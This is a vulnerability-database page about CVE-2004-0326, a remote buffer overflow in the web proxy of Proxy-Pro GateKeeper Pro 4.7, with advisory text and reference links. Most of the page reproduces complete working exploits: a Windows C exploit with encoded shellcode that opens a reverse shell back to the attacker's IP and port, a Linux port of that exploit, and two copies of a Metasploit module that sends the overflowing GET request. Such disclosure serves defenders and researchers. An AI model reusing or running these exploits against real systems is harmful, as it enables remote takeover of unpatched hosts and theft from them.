CVE-2004-0326
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:54
NMCOEPS    

[原文]Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD]Proxy-Pro Professional GateKeeper Web代理缓冲区溢出漏洞(CNNVD-200411-100)

        
        Proxy-Pro Professional GateKeeper是一款代理服务程序,可对多种协议进行处理。
        Proxy-Pro Professional GateKeeper包含的WEB代理存在缓冲区溢出攻击,远程攻击者可以利用这个漏洞可能以GateKeeper进程权限在系统上执行任意指令。
        通过提交包含超长数据的HTT GET请求通过GateKeeper的WEB代理组件,可触发缓冲区溢出,精心构建提交数据可能以GateKeeper进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0326
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-100
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017703.html
(UNKNOWN)  FULLDISC  20040222 GateKeeper Pro 4.7 buffer overflow
http://marc.info/?l=bugtraq&m=107755692400728&w=2
(UNKNOWN)  BUGTRAQ  20040222 GateKeeper Pro 4.7 buffer overflow
http://www.securityfocus.com/bid/9716
(VENDOR_ADVISORY)  BID  9716
http://xforce.iss.net/xforce/xfdb/15277
(VENDOR_ADVISORY)  XF  gatekeeper-long-get-bo(15277)

- 漏洞信息

Proxy-Pro Professional GateKeeper Web代理缓冲区溢出漏洞
危急 边界条件错误
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        Proxy-Pro Professional GateKeeper是一款代理服务程序,可对多种协议进行处理。
        Proxy-Pro Professional GateKeeper包含的WEB代理存在缓冲区溢出攻击,远程攻击者可以利用这个漏洞可能以GateKeeper进程权限在系统上执行任意指令。
        通过提交包含超长数据的HTT GET请求通过GateKeeper的WEB代理组件,可触发缓冲区溢出,精心构建提交数据可能以GateKeeper进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Proxy-Pro
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.proxy-pro.com/professional/index.html

- 漏洞信息 (155)

GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit (EDBID:155)
windows remote
2004-02-26 Verified
3128 kralor
N/A [点击下载]
/*================[CRPT - FrenchTeam] =================*
  [Coromputer Security Advisory] - [CRPTSA-01]
 *=================== [Summary] =====================*
  Software : GateKeeper Pro 4.7
  Platforms : win32
  Risk : High
  Impact : Buffer overflow
  Release Date : 2004-02-23

 *=================== [Description] ====================*
  there is a trivial buffer overflow in the web proxy (default port 3128).

 *==================== [Details] ======================*
  Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
  violation. Other services not tested, but they can be vulnerable too. Exact
  version can be checked from the administration service (default port 2000).

 *==================== [Exploits] ======================*
 /****************************************************/
 /* [Crpt]    GateKeeper Pro 4.7 remote sploit by kralor    [Crpt]  */
 /****************************************************/
 /* bug discovered & coded by: kralor [from coromputer]            */
 /* tested on: win2k pro and winXP                                          */
 /* it uses a static offset to hijack execution to the shellcode..    */
 /* so it is 100% universal. Nothing more to say..                      */
 /****************************************************/
 /*informations: www coromputer net irc undernet #coromputer    */
 /****************************************************/

 #include <stdio.h>
 #include <stdlib.h>
 #include <windows.h>
 #include <winsock.h>

 #pragma comment (lib,"ws2_32")

 #define PORT 3128
 #define ADMIN_PORT 2000
 #define VERSION "4.7.0"
 #define RET_POS 4079
 #define SIZE 4105
 #define RET_ADDR 0x03b1e121
 #define REQ  "GET http://www.microsoft.com/"
 #define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
 #define HOP 0xd4 // host opcode
 #define POP 0xd7 // port opcode

 int cnx(char *host, int port)
 {
        int sock;
        struct sockaddr_in yeah;
        struct hostent *she;

        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return 0;
                }
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons((u_short)port);

 if((she=gethostbyname(host))!=NULL) {
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
 }


 void banner(void)
 {
        printf("\r\n\t  [Crpt] GateKeeper Pro 4.7 remote sploit by kralor [Crpt]\r\n");
        printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
        return;
 }


 void syntax(char *prog)
 {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
        exit(0);
 }

 int main(int argc, char *argv[])
 {
        WSADATA wsaData;
        int sock;
        char buffer[1024],useme[SIZE],*ptr;
        unsigned long host,port;
        unsigned int i;
        char shellc0de[] =   /* sizeof(shellc0de+xorer) == 332 bytes */
        /* classic xorer */
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
        "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
        /* shellc0de */
        "\x1e\x61\xc0\xc3\xf1\x34\xa5"
        "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
        "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
        "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
        "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
        "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
        "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
        "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
        "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
        "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
        "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
        "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
        "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
        "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
        "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
        "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
        "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
        "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
        "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
        "\xcb\xc8\xce\x57\x91\x95";

        banner();

 if(argc!=4)
        syntax(argv[0]);
        host=inet_addr(argv[2])^0x95959595;
        port=atoi(argv[3]);
        if(port<=0||port>65535) {
                printf("error: <port> must be between 1 and 65535\r\n");
                return -1;
        }
        port=htons((unsigned short)port);
        port=port<<16;
        port+=0x0002;
        port=port^0x95959595;

 for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
                if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                        memcpy(&shellc0de[i],&host,4);
                        host=0;
                        }
        if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
                if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                        memcpy(&shellc0de[i],&port,4);
                        port=0;
                        }
 }
 if(host||port) {
        printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n");
        return -1;
        }

 if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("[i] error: unable to load winsock\r\n");
        return -1;
        }
        printf("[-] Getting version through administration interface\r\n");
        sock=cnx(argv[1],ADMIN_PORT);
 if(!sock)
        printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
 else {
        send(sock,"I'm a script kiddie\r\n",21,0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        ptr=strstr(buffer,"GateKeeper@");
 if(!ptr)
        printf("[i] waring: version not found, trying anyway\r\n");
 else {
        ptr+=11;
        if(strncmp(ptr,VERSION,strlen(VERSION))) {
                printf("[i] error: wrong version\r\n");
                return -1;
        }
        printf("[i] %-44s ...OK\r\n","version");
        }
 }
        printf("[i] Starting to exploit\r\n");
        sock=cnx(argv[1],PORT);
 if(!sock)
        return -1;
        printf("[i] Preparing magic %-28s ...","packet");
        memset(useme,0x90,SIZE);
        memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));
        *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory
        memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
        printf("Done\r\n");
        printf("[i] Sending magic packet                         ...");
        send(sock,REQ,strlen(REQ),0);
        send(sock,useme,sizeof(useme),0);
        send(sock,REQ2,strlen(REQ2),0);
        printf("Done\r\n");
        closesocket(sock);
        return 0;
 }

 *================================= [Solutions] =================================*
  No solution, wait for Infopulse to read this advisory and release a patch.

 *================================= [Workaround] ================================*
  block undesired access to port 3128 (or uninstall the software and use a real
  proxy coded by real coders).

 *================================== [Credits] ==================================*
  Discovered and coded by Ivan Rodriguez Almuina <kralor@coromputer.net>

 *================================= [Disclaimer] ================================*
  The information within this paper may change without notice.
  Use of this information constitutes acceptance for use in an AS IS condition.
  There are NO warranties with to this information.
  In no event shall the author be liable for any damages whatsoever arising out
  of or in connection with the use or spread of this information.
  Any use of this information is at the user's own risk.

 *================================== [Feedback] =================================*
  Please send suggestions, updates, and comments to :
  irc : #coromputer on undernet
  url : http://www.coromputer.net
  mail : kralor@coromputer.net

\*============================\* www.coromputer.net */===========================*/

// milw0rm.com [2004-02-26]
		

- 漏洞信息 (16692)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (EDBID:16692)
windows remote
2010-09-20 Verified
3128 metasploit
N/A [点击下载]
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Proxy-Pro Professional
				GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2004-0326'],
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Feb 23 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(3128)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- 漏洞信息 (23741)

Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun Vulnerability (EDBID:23741)
windows remote
2004-02-23 Verified
0 kralor
N/A [点击下载]
source: http://www.securityfocus.com/bid/9716/info

Proxy-Pro Professional GateKeeper is prone to a remotely exploitable buffer overrun that may be triggered by passing HTTP GET requests of excessive length through the web proxy component. This could be exploited to execute arbitrary code in the context of the software.

/******************************************************************/
 /* [Crpt]    GateKeeper Pro 4.7 remote sploit by
kralor    [Crpt] */

/******************************************************************/
 /* bug discovered & coded by: kralor [from
coromputer]            */
 /* tested on: win2k pro and winXP                    
            */
 /* it uses a static offset to hijack execution to the
shellcode.. */
 /* so it is 100% universal. Nothing more to say..    
            */

/******************************************************************/
 /*informations: www.coromputer.net,irc undernet
#coromputer       *
  *                                                   
            *
  *       Ported to Linux by shaun2k2 -
shaunige@yahoo.co.uk       *
  *                     www.nettwerked.co.uk          
            */

/******************************************************************/


/* UNIX include files. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

/* Our defines. */
#define PORT 3128
#define ADMIN_PORT 2000
#define VERSION "4.7.0"
#define RET_POS 4079
#define SIZE 4105
#define RET_ADDR 0x03b1e121
/* Changing this might be advisable :P */
#define REQ  "GET http://www.microsoft.com/"
#define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode

 int cnx(char *host, int port)
 {
        int sock; /* our little socket. */
        struct sockaddr_in yeah;
        struct hostent *she;

        /* Create the socket. */
        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create
socket\r\n");
                return 0;
        }

        /* Fill in the address info struct. */
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons((u_short)port);

        /* Does the host exist? */
 if((she=gethostbyname(host))!=NULL) {
        memcpy((char
*)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
       
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE)
{
                printf("error: cannot resolve
host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct
sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection
refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
 }


 void banner(void)
 {
        printf("\r\n\t  [Crpt] GateKeeper Pro 4.7
remote sploit by kralor [Crpt]\r\n");
        printf("\t\t www.coromputer.net && undernet
#coromputer\r\n\r\n");
        printf("\n\t\t Ported to Linux by shaun2k2 -
shaunige@yahoo.co.uk\n\n");
        return;
 }


 void syntax(char *prog)
 {
        printf("syntax: %s <host> <your_ip>
<your_port>\r\n",prog);
        exit(0);
 }

 int main(int argc, char *argv[])
 {
        int sock;
        char buffer[1024],useme[SIZE],*ptr;
        unsigned long host,port;
        unsigned int i;
        char shellc0de[] =   /*
sizeof(shellc0de+xorer) == 332 bytes */
        /* classic xorer */
       
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
        "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
        /* shellc0de */
        "\x1e\x61\xc0\xc3\xf1\x34\xa5"
       
"\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
       
"\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
       
"\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
       
"\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
       
"\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
       
"\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
       
"\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
       
"\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
       
"\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
       
"\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
       
"\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
       
"\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
       
"\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
       
"\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
       
"\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
       
"\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
       
"\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
       
"\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
        "\xcb\xc8\xce\x57\x91\x95";

        banner();

 if(argc!=4)
        syntax(argv[0]);
        host=inet_addr(argv[2])^0x95959595;
        port=atoi(argv[3]);
        if(port<=0||port>65535) {
                printf("error: <port> must be between
1 and 65535\r\n");
                return -1;
        }
        port=htons((unsigned short)port);
        port=port<<16;
        port+=0x0002;
        port=port^0x95959595;

 for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned
char)shellc0de[i+1]==HOP)
                if((unsigned
char)shellc0de[i+2]==HOP&&(unsigned
char)shellc0de[i+3]==HOP) {
                        memcpy(&shellc0de[i],&host,4);
                        host=0;
                        }
        if((unsigned char)shellc0de[i]==POP&&(unsigned
char)shellc0de[i+1]==POP)
                if((unsigned
char)shellc0de[i+2]==POP&&(unsigned
char)shellc0de[i+3]==POP) {
                        memcpy(&shellc0de[i],&port,4);
                        port=0;
                        }
 }
 if(host||port) {
        printf("[i] error: unabled to find ip/port
sequence in shellc0de\r\n");
        return -1;
        }

        printf("[-] Getting version through
administration interface\r\n");
        sock=cnx(argv[1],ADMIN_PORT);
 if(!sock)
        printf("[i] warning: couldn't connect to admin
int to get version, trying anyway\r\n");
 else {

        /* If you really aren't a script kiddie, you
might wanna remove
         * these ;) */
        send(sock,"I'm a script kiddie\r\n",21,0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        memset(buffer,0,sizeof(buffer));

        /* recv the daemon version. */
        recv(sock,buffer,sizeof(buffer),0);

        /* Checking if the daemon is GateKeeper. */
        ptr=strstr(buffer,"GateKeeper@");

        if(!ptr)
        printf("[i] warning: version not found, trying
anyway\r\n");
 else {
        ptr+=11;

        /* Check for the vulnerable version. */
        if(strncmp(ptr,VERSION,strlen(VERSION))) {
                printf("[i] error: wrong
version\r\n");
                return -1;
        }
        printf("[i] %-44s ...OK\r\n","version");
        }
 }
        printf("[i] Starting to exploit\r\n");
        sock=cnx(argv[1],PORT);
 if(!sock)
        return -1;
        printf("[i] Preparing magic %-28s
...","packet");

        /* Fill the exploit buffer with NOPs (hex
0x90). */
        memset(useme,0x90,SIZE);

        /* Copy the shellcode into the exploit buffer.
*/
       
memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));

        /* Return address here.  The ret address is
placed in a specific
         * place, as kralor seems to know exactly
where it needs to be. */
        *(unsigned long*)&useme[RET_POS] = RET_ADDR;
       
memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5);
// jmp $ - 0x92c
        printf("Done\r\n");
        printf("[i] Sending magic packet              
          ...");
        send(sock,REQ,strlen(REQ),0);

        /* Inject the exploit buffer! */
        send(sock,useme,sizeof(useme),0);
        send(sock,REQ2,strlen(REQ2),0);
        printf("Done\r\n");
        close(sock);

        /* return sucess. */
        return 0;
 }
		

- 漏洞信息 (F82930)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (PacketStormID:F82930)
2009-10-30 00:00:00
MC  metasploit.com
exploit,remote,web,overflow,arbitrary
CVE-2004-0326
[点击下载]

This Metasploit module exploits a stack overflow in Proxy-Pro Professional GateKeeper 4.7. By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
		        This module exploits a stack overflow in Proxy-Pro Professional
		        GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2004-0326'], 
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],

			'Privileged'     => true,

			'DisclosureDate' => 'Feb 23 2004',

			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(3128)
				], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)  
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) 
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n" 

		sock.put(sploit)
		sock.get_once(-1, 3)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

4027
Proxy-Pro Professional GateKeeper Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

A remote overflow exists in Proxy-Pro Gatekeeper Professional. The product fails to validate HTTP requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-02-23 2004-02-23
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Proxy-Pro Professional GateKeeper Web Proxy Buffer Overrun Vulnerability
Boundary Condition Error 9716
Yes No
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery is credited to Iván Rodriguez Almuiña.

- 受影响的程序版本

Proxy-Pro Professional GateKeeper 4.7

- 漏洞讨论

Proxy-Pro Professional GateKeeper is prone to a remotely exploitable buffer overrun that may be triggered by passing HTTP GET requests of excessive length through the web proxy component. This could be exploited to execute arbitrary code in the context of the software.

- 漏洞利用

The following exploits were made available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站